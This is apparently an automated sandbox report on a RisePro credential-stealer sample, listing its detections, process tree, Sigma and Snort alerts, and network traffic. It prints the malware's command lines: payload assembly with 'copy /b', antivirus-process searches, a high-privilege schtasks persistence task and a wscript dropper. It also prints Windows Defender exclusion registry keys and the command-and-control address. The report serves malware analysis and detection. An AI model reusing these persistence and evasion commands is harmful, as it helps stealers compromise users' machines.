Edit tour

Windows Analysis Report
External24.exe

Overview

General Information

Sample name:	External24.exe
Analysis ID:	1464408
MD5:	e8af10713a9e8ee414a1a0865c2379f2
SHA1:	12193121a75325ca4a32e7260d82e6d8c85fe0d4
SHA256:	acad873da34aab461e8a7b87dd2c6d98c3b2b187f5ca868415bac26af1516da5
Tags:	exe
Infos:

Detection

RisePro Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Sigma detected: Search for Antivirus process

Snort IDS alert for network traffic

Yara detected RisePro Stealer

AI detected suspicious sample

Adds extensions / path to Windows Defender exclusion list (Registry)

Contains functionality to inject threads in other processes

Disable Windows Defender real time protection (registry)

Disables Windows Defender (deletes autostart)

Drops PE files with a suspicious file extension

Exclude list of file types from scheduled, custom, and real-time scanning

Found API chain indicative of sandbox detection

Found evasive API chain (may stop execution after checking mutex)

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Found many strings related to Crypto-Wallets (likely being stolen)

Found stalling execution ending in API Sleep call

Injects a PE file into a foreign processes

Machine Learning detection for sample

Modifies Group Policy settings

Sigma detected: Suspicious Command Patterns In Scheduled Task Creation

Sigma detected: WScript or CScript Dropper

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes many files with high entropy

Wscript called in batch mode (surpress errors)

Abnormal high CPU Usage

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to detect sandboxes (mouse cursor move detection)

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found decision node followed by non-executed suspicious APIs

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

PE / OLE file has an invalid certificate

Potential key logger detected (key state polling based)

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Copy From or To System Directory

Sigma detected: Suspicious Schtasks From Env Var Folder

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Sigma detected: Windows Defender Exclusions Added - Registry

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses the system / local time for branch decision (may execute only at specific dates)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

External24.exe (PID: 7108 cmdline: "C:\Users\user\Desktop\External24.exe" MD5: E8AF10713A9E8EE414A1A0865C2379F2)

cmd.exe (PID: 6340 cmdline: "C:\Windows\System32\cmd.exe" /c copy Forgot Forgot.cmd & Forgot.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 5104 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 480 cmdline: findstr /I "wrsa.exe opssvc.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

tasklist.exe (PID: 1440 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 3444 cmdline: findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 7140 cmdline: cmd /c md 292668 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

findstr.exe (PID: 6588 cmdline: findstr /V "towersallowancemeaninghelp" Wine MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 7148 cmdline: cmd /c copy /b Therefore + Physical + Inflation + Inspections + Sharon + Lung + Appearance + Warming + Army + Latinas + Anytime + Wiley + Zoning + Cincinnati + Accidents + Helena 292668\r MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Lawyers.pif (PID: 7084 cmdline: 292668\Lawyers.pif 292668\r MD5: B06E67F9767E5023892D9698703AD098)

schtasks.exe (PID: 4296 cmdline: schtasks.exe /create /tn "PixelFlow" /tr "wscript //B 'C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.js'" /sc onlogon /F /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 5104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Lawyers.pif (PID: 2304 cmdline: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif MD5: B06E67F9767E5023892D9698703AD098)

timeout.exe (PID: 5480 cmdline: timeout 15 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

wscript.exe (PID: 4144 cmdline: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)

PixelFlow.pif (PID: 6588 cmdline: "C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif" "C:\Users\user\AppData\Local\PixelFlow Creations\m" MD5: B06E67F9767E5023892D9698703AD098)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\7yC9aM3nOPMh37Qvw5GmIXM.zip	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000015.00000002.3501596780.0000000000F26000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
00000015.00000002.3501596780.0000000000F26000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000015.00000003.3035585776.00000000058AF000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
00000015.00000003.3349195349.0000000000F26000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
00000015.00000003.3349195349.0000000000F26000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Lawyers.pif PID: 2304	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
Process Memory Space: Lawyers.pif PID: 2304	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 2 entries

Sigma Signatures

System Summary

Sigma detected: Suspicious Command Patterns In Scheduled Task Creation

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "PixelFlow" /tr "wscript //B 'C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.js'" /sc onlogon /F /RL HIGHEST, CommandLine: schtasks.exe /create /tn "PixelFlow" /tr "wscript //B 'C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.js'" /sc onlogon /F /RL HIGHEST, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 292668\Lawyers.pif 292668\r, ParentImage: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif, ParentProcessId: 7084, ParentProcessName: Lawyers.pif, ProcessCommandLine: schtasks.exe /create /tn "PixelFlow" /tr "wscript //B 'C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.js'" /sc onlogon /F /RL HIGHEST, ProcessId: 4296, ProcessName: schtasks.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.js", ProcessId: 4144, ProcessName: wscript.exe

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: 292668\Lawyers.pif 292668\r, CommandLine: 292668\Lawyers.pif 292668\r, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Forgot Forgot.cmd & Forgot.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6340, ParentProcessName: cmd.exe, ProcessCommandLine: 292668\Lawyers.pif 292668\r, ProcessId: 7084, ProcessName: Lawyers.pif

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Sigma detected: Suspicious Copy From or To System Directory

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Forgot Forgot.cmd & Forgot.cmd, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Forgot Forgot.cmd & Forgot.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\External24.exe", ParentImage: C:\Users\user\Desktop\External24.exe, ParentProcessId: 7108, ParentProcessName: External24.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Forgot Forgot.cmd & Forgot.cmd, ProcessId: 6340, ProcessName: cmd.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.js", ProcessId: 4144, ProcessName: wscript.exe

Sigma detected: Windows Defender Exclusions Added - Registry

Source: Registry Key set

Author: Christian Burkard (Nextron Systems): Data: Details: 1, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif, ProcessId: 2304, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{B99BD73F-BA9A-4579-8F31-FFF38CE1CEEC}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Exclusions_Extensions

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Search for Antivirus process

Source: Process started

Author: Joe Security: Data: Command: findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" , CommandLine: findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Forgot Forgot.cmd & Forgot.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6340, ParentProcessName: cmd.exe, ProcessCommandLine: findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" , ProcessId: 3444, ProcessName: findstr.exe

Snort Signatures

ET TROJAN [ANY.RUN] RisePro TCP (Token) - Source IP: 3.36.173.8 - Destination IP: 192.168.2.4

Timestamp:	06/28/24-19:53:15.750961
SID:	2046266
Source Port:	50500
Destination Port:	55333
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN RisePro CnC Activity (Outbound) - Source IP: 3.36.173.8 - Destination IP: 192.168.2.4

Timestamp:	06/28/24-19:53:52.881709
SID:	2049660
Source Port:	50500
Destination Port:	55333
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN RisePro TCP Heartbeat Packet - Source IP: 192.168.2.4 - Destination IP: 3.36.173.8

Timestamp:	06/28/24-19:53:14.975494
SID:	2049060
Source Port:	55333
Destination Port:	50500
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN [ANY.RUN] RisePro TCP (Activity) - Source IP: 192.168.2.4 - Destination IP: 3.36.173.8

Timestamp:	06/28/24-19:53:22.922809
SID:	2046269
Source Port:	55333
Destination Port:	50500
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN [ANY.RUN] RisePro TCP (Token) - Source IP: 3.36.173.8 - Destination IP: 192.168.2.4

Timestamp:	06/28/24-19:53:54.610472
SID:	2046266
Source Port:	50500
Destination Port:	55336
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN [ANY.RUN] RisePro TCP (External IP) - Source IP: 3.36.173.8 - Destination IP: 192.168.2.4

Timestamp:	06/28/24-19:53:16.013390
SID:	2046267
Source Port:	50500
Destination Port:	55333
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: External24.exe

ReversingLabs: Detection: 18%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.6% probability

Machine Learning detection for sample

Source: External24.exe

Joe Sandbox ML: detected

Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif

Code function: 21_2_00C16B00 CryptUnprotectData,CryptUnprotectData,LocalFree,LocalFree,

21_2_00C16B00

Source: External24.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:55334 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.75.166:443 -> 192.168.2.4:55335 version: TLS 1.2

Source: External24.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Change of critical system settings

Adds extensions / path to Windows Defender exclusion list (Registry)

Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{B99BD73F-BA9A-4579-8F31-FFF38CE1CEEC}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions Exclusions_Extensions			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{B99BD73F-BA9A-4579-8F31-FFF38CE1CEEC}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions exe			Jump to behavior

Source: C:\Users\user\Desktop\External24.exe	Code function: 0_2_00406301 FindFirstFileW,FindClose,	0_2_00406301
Source: C:\Users\user\Desktop\External24.exe	Code function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00406CC7
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_006647B7 GetFileAttributesW,FindFirstFileW,FindClose,	15_2_006647B7
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_0066F8A3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	15_2_0066F8A3
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_00663E72 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	15_2_00663E72
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_0066C16C FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	15_2_0066C16C
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_0066CB81 FindFirstFileW,FindClose,	15_2_0066CB81
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_0066CC0C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	15_2_0066CC0C
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_0066F445 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	15_2_0066F445
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_0066F5A2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	15_2_0066F5A2
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_00663B4F FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	15_2_00663B4F
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_006CC16C FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	21_2_006CC16C
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_006C47B7 GetFileAttributesW,FindFirstFileW,FindClose,	21_2_006C47B7
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_006CCB81 FindFirstFileW,FindClose,	21_2_006CCB81
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_006CCC0C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	21_2_006CCC0C
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_006CF445 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	21_2_006CF445
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_006CF5A2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	21_2_006CF5A2
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_006CF8A3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	21_2_006CF8A3
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_006C3B4F FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	21_2_006C3B4F
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_006C3E72 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	21_2_006C3E72
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C16000 CreateDirectoryA,FindFirstFileA,FindNextFileA,GetLastError,FindClose,	21_2_00C16000
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C36770 CreateDirectoryA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,GetLastError,SetFileAttributesA,GetLastError,RemoveDirectoryA,GetLastError,GetLastError,std::_Throw_Cpp_error,std::_Throw_Cpp_error,	21_2_00C36770
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00B81F9C FindClose,FindFirstFileExW,GetLastError,	21_2_00B81F9C
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00BE3F40 SHGetFolderPathA,FindFirstFileA,FindNextFileA,FindClose,CreateDirectoryA,CreateDirectoryA,CreateDirectoryA,CopyFileA,CreateDirectoryA,CreateDirectoryA,CopyFileA,CopyFileA,	21_2_00BE3F40
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00B82022 GetLastError,GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx,	21_2_00B82022

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2049060 ET TROJAN RisePro TCP Heartbeat Packet 192.168.2.4:55333 -> 3.36.173.8:50500
Source: Traffic	Snort IDS: 2046266 ET TROJAN [ANY.RUN] RisePro TCP (Token) 3.36.173.8:50500 -> 192.168.2.4:55333
Source: Traffic	Snort IDS: 2046267 ET TROJAN [ANY.RUN] RisePro TCP (External IP) 3.36.173.8:50500 -> 192.168.2.4:55333
Source: Traffic	Snort IDS: 2046269 ET TROJAN [ANY.RUN] RisePro TCP (Activity) 192.168.2.4:55333 -> 3.36.173.8:50500
Source: Traffic	Snort IDS: 2049660 ET TROJAN RisePro CnC Activity (Outbound) 3.36.173.8:50500 -> 192.168.2.4:55333
Source: Traffic	Snort IDS: 2046266 ET TROJAN [ANY.RUN] RisePro TCP (Token) 3.36.173.8:50500 -> 192.168.2.4:55336

Source: global traffic

TCP traffic: 192.168.2.4:55333 -> 3.36.173.8:50500

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 34.117.186.192 34.117.186.192
Source: Joe Sandbox View	IP Address: 34.117.186.192 34.117.186.192
Source: Joe Sandbox View	IP Address: 172.67.75.166 172.67.75.166

Source: Joe Sandbox View

ASN Name: AMAZONEXPANSIONGB AMAZONEXPANSIONGB

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: unknown	DNS query: name: ipinfo.io
Source: unknown	DNS query: name: ipinfo.io

Source: global traffic	HTTP traffic detected: GET /widget/demo/8.46.123.33 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /demo/home.php?s=8.46.123.33 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com

Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.173.8
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.173.8
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.173.8
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.173.8
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.173.8
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.173.8
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.173.8
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.173.8
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.173.8
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.173.8
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.173.8
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.173.8
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.173.8
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.173.8
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.173.8
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.173.8
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.173.8
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.173.8
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.173.8
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.173.8
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.173.8
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.173.8
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.173.8
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.173.8
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.173.8
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.173.8
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.173.8
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.173.8
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.173.8
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.173.8
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.173.8
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.173.8
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.173.8
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.173.8
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.173.8
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.173.8
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.173.8
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.173.8
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.173.8
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.173.8
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.173.8
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.173.8
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.173.8
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.173.8
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.173.8
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.173.8
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.173.8
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.173.8
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.173.8
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.173.8

Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif

Code function: 15_2_0067279E InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

15_2_0067279E

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /widget/demo/8.46.123.33 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
